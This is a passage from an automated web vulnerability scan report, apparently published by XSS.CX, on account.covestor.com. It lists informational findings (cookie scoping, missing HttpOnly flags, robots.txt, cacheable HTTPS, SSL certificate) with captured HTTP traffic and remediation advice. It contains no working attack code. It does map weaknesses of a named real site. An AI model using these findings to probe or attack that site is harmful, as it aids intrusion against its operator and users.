The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

email=&emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:44:50 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:44:50 GMT;path=/
Set-Cookie: C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/
Expires: Wed, 09 Nov 2011 13:44:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. https://account.covestor.com/mirroring-account/join-trial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://covestor.com/
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:41:03 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/
Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/
Expires: Wed, 09 Nov 2011 13:41:03 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...

5.2. https://account.covestor.com/mirroring-account/join-trial  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.covestor.com/mirroring-account/join-trial
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; C1320846063250=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

email=&emailconfirm=&password=&fname=&lname=&phone=&terms=1&action=1&=Activate+Free+Trial

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:44:50 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:44:50 GMT;path=/
Set-Cookie: C1320846290554=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:49:49 GMT;path=/
Expires: Wed, 09 Nov 2011 13:44:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...

6. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: account.covestor.com

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:41:05 GMT
Server: COVESTOR
Last-Modified: Fri, 01 Apr 2011 15:48:04 GMT
Accept-Ranges: bytes
Content-Length: 30
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /api/

7. Cacheable HTTPS response  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /mirroring-account/join-trial

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /mirroring-account/join-trial HTTP/1.1
Host: account.covestor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://covestor.com/
Cookie: COVESTOR_AFF=%255BUS%255D%26%26%26%26http%253A%252F%252Fcovestor%252Ecom%252F; __utma=100923155.1926746815.1320845508.1320845508.1320845508.1; __utmb=100923155.1.10.1320845508; __utmc=100923155; __utmz=100923155.1320845508.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 09 Nov 2011 13:41:03 GMT
Server: COVESTOR
Set-Cookie: COVESTOR=;domain=.covestor.com;Secure;expires=Tue, 09-Nov-2010 13:41:03 GMT;path=/
Set-Cookie: C1320846063712=CCC%20https%3A%2F%2Faccount%2Ecovestor%2Ecom%2Fmirroring%2Daccount%2Fjoin%2Dtrial;domain=.covestor.com;expires=Wed, 09-Nov-2011 13:46:02 GMT;path=/
Expires: Wed, 09 Nov 2011 13:41:03 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   
       <!-- start head:me
...[SNIP]...

8. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.covestor.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.covestor.com
Issued by:  RapidSSL CA
Valid from:  Mon Feb 21 00:50:21 CST 2011
Valid to:  Sun Mar 25 04:08:52 CDT 2012

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 CST 2010
Valid to:  Tue Feb 18 16:45:05 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Thu Nov 10 10:29:36 CST 2011.